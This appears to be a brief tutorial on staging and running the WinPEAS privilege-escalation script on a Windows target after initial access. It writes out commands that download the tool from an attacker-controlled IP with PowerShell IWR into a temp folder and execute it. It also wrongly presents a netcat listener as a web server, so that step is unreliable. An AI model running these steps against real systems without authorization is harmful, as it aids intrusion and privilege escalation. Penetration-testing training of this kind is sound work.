WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities

How to

1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

  • git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
  • cd privilege-escalation-awesome-scripts-suite

2. Navigate through the directories to find the binary files

  • cd winPEAS/winPEASexe/binaries/
  • ls

3. Depending on the type of machine you need to use x64 or x86, This demo will be used on a x64 machine, so, I choose that one

  • cd x64/Release
  • ls

4. There we have our executable script winPEASx64.exe. We now need to find a way to move it to our target machine and execute it

5. We will start a web server at the binary location

  • nc -lvp 9999

6. From the remote server I will use Powershell (IWR), you can also use cmd (certutil)

  • cd C:\Windows\Temp
  • IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
  • dir

7. Now that it is in the server, execute it

  • .\winPEASx64.exe

8. Now you can start inspecting the data

Extra

1. Sometimes it is better to try .bat file if the .exe is failing

  • powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
  • dir

2. Run the app

  • .\winPEAS.bat